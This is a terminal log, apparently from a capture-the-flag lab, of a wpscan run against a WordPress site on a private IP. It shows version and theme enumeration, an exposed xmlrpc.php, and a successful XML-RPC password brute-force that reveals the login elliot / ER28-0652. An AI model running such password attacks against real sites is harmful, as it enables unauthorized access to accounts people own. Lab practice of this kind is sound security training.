[mr_robot_ctf]: wpscan --url http://10.10.52.53 -P files/fsocity_sorted.dic -U elliot _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.8 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.52.53/ [10.10.52.53] [+] Started: Sat Feb 15 12:20:42 2020 Interesting Finding(s): [+] http://10.10.52.53/ | Interesting Entries: | - Server: Apache | - X-Mod-Pagespeed: 1.9.32.3-4523 | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://10.10.52.53/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] http://10.10.52.53/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access [+] http://10.10.52.53/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15). | Found By: Emoji Settings (Passive Detection) | - http://10.10.52.53/95dc727.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1' | Confirmed By: Meta Generator (Passive Detection) | - http://10.10.52.53/95dc727.html, Match: 'WordPress 4.3.1' [+] WordPress theme in use: twentyfifteen | Location: http://10.10.52.53/wp-content/themes/twentyfifteen/ | Last Updated: 2019-05-07T00:00:00.000Z | Readme: http://10.10.52.53/wp-content/themes/twentyfifteen/readme.txt | [!] The version is out of date, the latest version is 2.5 | Style URL: http://10.10.52.53/wp-content/themes/twentyfifteen/style.css?ver=4.3.1 | Style Name: Twenty Fifteen | Style URI: https://wordpress.org/themes/twentyfifteen/ | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In 404 Page (Passive Detection) | | Version: 1.3 (80% confidence) | Found By: Style (Passive Detection) | - http://10.10.52.53/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:05 <==================================================================> (21 / 21) 100.00% Time: 00:00:05 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc Multicall against 1 user/s [SUCCESS] - elliot / ER28-0652 All Found Progress Time: 00:06:23 <============================================= > (12 / 22) 54.54% ETA: ??:??:?? [i] Valid Combinations Found: | Username: elliot, Password: ER28-0652 [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Sat Feb 15 12:27:20 2020 [+] Requests Done: 66 [+] Cached Requests: 6 [+] Data Sent: 15.197 KB [+] Data Received: 1.457 MB [+] Memory used: 216.508 MB [+] Elapsed time: 00:06:37